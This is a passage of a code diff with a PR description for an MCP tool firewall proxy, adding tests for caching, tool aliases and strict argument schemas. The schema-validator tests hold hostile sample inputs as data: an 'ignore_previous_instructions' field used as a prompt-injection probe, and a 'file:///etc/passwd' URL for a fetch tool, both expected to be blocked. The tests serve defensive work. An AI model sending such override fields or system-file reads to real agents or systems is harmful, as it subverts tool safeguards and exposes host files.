+
 export const extractAuthorizationFromBody = (body: Record<string, unknown>): string | undefined => {
   for (const tool of extractToolInvocations(body)) {
     const authorization = tool._meta?.authorization;

--- a/tests/app.test.ts
+++ b/tests/app.test.ts
@@ -165,4 +165,43 @@ describe('app /mcp integration', () => {
     expect(response.status).toBe(403);
     expect(response.body.error.code).toBe('UNKNOWN_ROUTE');
   });
+
+  it('routes a common alias contract through the HTTP review harness', async () => {
+    registerRoute('list_files', {
+      url: `${targetBaseUrl}/tools/list_files`,
+      timeoutMs: 1000,
+    });
+
+    const payload = {
+      method: 'tools/call',
+      params: {
+        name: 'list_files',
+        arguments: { path: '/tmp', recursive: true },
+      },
+    };
+
+    const authHeader = createAuthHeader(['tools.list_files']);
+
+    const firstResponse = await request(app)
+      .post('/mcp')
+      .set('Authorization', authHeader)
+      .send(payload);
+
+    const secondResponse = await request(app)
+      .post('/mcp')
+      .set('Authorization', authHeader)
+      .send(payload);
+
+    expect(firstResponse.status).toBe(200);
+    expect(firstResponse.headers['x-proxy-cache']).toBe('MISS');
+    expect(secondResponse.status).toBe(200);
+    expect(secondResponse.headers['x-proxy-cache']).toBe('HIT');
+    expect(secondResponse.body).toEqual(firstResponse.body);
+    expect(firstResponse.body).toEqual({
+      ok: true,
+      tool: 'list_files',
+      arguments: { path: '/tmp', recursive: true },
+    });
+    expect(requestCount).toBe(1);
+  });
 });

--- a/tests/cli.test.ts
+++ b/tests/cli.test.ts
@@ -68,8 +68,8 @@ describe('stdio firewall proxy', () => {
       targetArgs: [path.join(process.cwd(), 'tests', 'fixtures', 'stdio-target.js')],
       cacheDir,
       cacheTtlSeconds: 60,
-      alwaysCacheTools: ['search_files'],
-      neverCacheTools: [],
+      alwaysCacheTools: ['read_file', 'read', 'open_file', 'list_directory', 'list_files', 'search_files', 'search'],
+      neverCacheTools: ['write_file', 'write', 'create_file', 'execute_command', 'execute'],
       proxyAuthToken: proxyToken,
     });
 
@@ -107,6 +107,37 @@ describe('stdio firewall proxy', () => {
       callCount: 1,
       tool: 'search_files',
       arguments: { query: 'TODO' },
+    });
+    expect(secondResponse.result).toEqual(firstResponse.result);
+  });
+
+  it('accepts a common alias contract over stdio', async () => {
+    const request = {
+      jsonrpc: '2.0',
+      id: 5,
+      method: 'tools/call',
+      params: {
+        name: 'read',
+        arguments: {
+          path: '/tmp/readme.md',
+          encoding: 'utf8',
+        },
+        _meta: {
+          authorization: createNhiAuthorization(['tools.read']),
+        },
+      },
+    };
+
+    clientInput.write(JSON.stringify(request) + '\n');
+    const firstResponse = await waitForJsonLine(clientOutput);
+
+    clientInput.write(JSON.stringify(request) + '\n');
+    const secondResponse = await waitForJsonLine(clientOutput);
+
+    expect(firstResponse.result).toEqual({
+      callCount: 1,
+      tool: 'read',
+      arguments: { path: '/tmp/readme.md', encoding: 'utf8' },
     });
     expect(secondResponse.result).toEqual(firstResponse.result);
   });
@@ -164,8 +195,8 @@ describe('stdio firewall proxy', () => {
       targetArgs: [path.join(process.cwd(), 'tests', 'fixtures', 'slow-stdio-target.js')],
       cacheDir,
       cacheTtlSeconds: 60,
-      alwaysCacheTools: ['search_files'],
-      neverCacheTools: [],
+      alwaysCacheTools: ['read_file', 'read', 'open_file', 'list_directory', 'list_files', 'search_files', 'search'],
+      neverCacheTools: ['write_file', 'write', 'create_file', 'execute_command', 'execute'],
       proxyAuthToken: proxyToken,
     });
 

--- a/tests/schema-validator.test.ts
+++ b/tests/schema-validator.test.ts
@@ -1,7 +1,7 @@
 import { jest, describe, it, expect } from '@jest/globals';
-import type { Request, Response, NextFunction } from 'express';
-import { z } from 'zod';
+import type { NextFunction, Request, Response } from 'express';
 import { createSchemaValidator } from '../src/middleware/schema-validator.js';
+import { mcpToolSchemas } from '../src/mcp-tool-schemas.js';
 
 function createMockReq(body: Record<string, unknown>): Partial<Request> {
   return {
@@ -27,57 +27,76 @@ function createMockRes(): { res: Partial<Response>; statusCode: number; response
 }
 
 describe('schema-validator (Progressive Disclosure)', () => {
-  const registry = {
-    'read_file': z.object({
-      path: z.string().max(100),
-    }).strict(),
-  };
+  const validator = createSchemaValidator(mcpToolSchemas);
 
-  const validator = createSchemaValidator(registry);
-
-  it('allows valid arguments for a registered tool', () => {
+  it('allows valid arguments for a registered file tool alias', () => {
     const req = createMockReq({
       method: 'tools/call',
-      params: { name: 'read_file', arguments: { path: '/etc/config' } },
+      params: { name: 'read', arguments: { path: '/etc/config', encoding: 'utf8', maxBytes: 256 } },
     });
     const { res } = createMockRes();
     const next = jest.fn();
 
     validator(req as Request, res as Response, next as NextFunction);
+
     expect(next).toHaveBeenCalledTimes(1);
+    expect(res.status).not.toHaveBeenCalled();
   });
 
-  it('blocks invalid arguments (wrong type) for a registered tool (Fail-Closed)', () => {
+  it('blocks invalid arguments when a strict schema sees an unexpected field', () => {
     const req = createMockReq({
       method: 'tools/call',
-      params: { name: 'read_file', arguments: { path: 123 } }, // path should be string
+      params: { name: 'write_file', arguments: { path: '/etc/config', content: 'secret', ignore_previous_instructions: true } },
     });
     const { res } = createMockRes();
     const next = jest.fn();
 
     validator(req as Request, res as Response, next as NextFunction);
+
     expect(next).not.toHaveBeenCalled();
     expect(res.status).toHaveBeenCalledWith(403);
-  });
 
-  it('blocks prompt injection (unexpected extra fields) via .strict()', () => {
-    const req = createMockReq({
-      method: 'tools/call',
-      params: { name: 'read_file', arguments: { path: '/etc/config', ignore_previous_instructions: true } },
-    });
-    const { res } = createMockRes();
-    const next = jest.fn();
-
-    validator(req as Request, res as Response, next as NextFunction);
-    expect(next).not.toHaveBeenCalled();
-    expect(res.status).toHaveBeenCalledWith(403);
-    
-    // check that the message returns specific details
     const body = (res.json as jest.Mock).mock.calls[0][0] as { error: { message: string } };
     expect(body.error.message).toContain('Fail-Closed');
   });
 
-  it('allows passthrough for unknown tools (if progressive disclosure only protects known boundaries)', () => {
+  it('blocks non-http(s) URLs for fetch_url', () => {
+    const req = createMockReq({
+      method: 'tools/call',
+      params: { name: 'fetch_url', arguments: { url: 'file:///etc/passwd' } },
+    });
+    const { res } = createMockRes();
+    const next = jest.fn();
+
+    validator(req as Request, res as Response, next as NextFunction);
+
+    expect(next).not.toHaveBeenCalled();
+    expect(res.status).toHaveBeenCalledWith(403);
+  });
+
+  it('allows a strict execute_command payload', () => {
+    const req = createMockReq({
+      method: 'tools/call',
+      params: {
+        name: 'execute_command',
+        arguments: {
+          command: 'node',
+          args: ['--version'],
+          cwd: '/tmp',
+          timeoutMs: 5000,
+        },
+      },
+    });
+    const { res } = createMockRes();
+    const next = jest.fn();
+
+    validator(req as Request, res as Response, next as NextFunction);
+
+    expect(next).toHaveBeenCalledTimes(1);
+    expect(res.status).not.toHaveBeenCalled();
+  });
+
+  it('allows passthrough for unknown tools', () => {
     const req = createMockReq({
       method: 'tools/call',
       params: { name: 'unknown_tool', arguments: { malicious: 'data' } },
@@ -86,6 +105,8 @@ describe('schema-validator (Progressive Disclosure)', () => {
     const next = jest.fn();
 
     validator(req as Request, res as Response, next as NextFunction);
+
     expect(next).toHaveBeenCalledTimes(1);
+    expect(res.status).not.toHaveBeenCalled();
   });
 });


### PR DESCRIPTION
## Summary
- add a repeatable stdio evidence benchmark with a reviewer corpus and JSON output packet
- expand the strict schema registry across common MCP tool aliases and align HTTP/stdio cache defaults
- document the benchmark methodology and supported schema families without issuing a new release

## Verification
- npm run verify:all
- npm run benchmark:stdio -- --json

Closes #12
Closes #13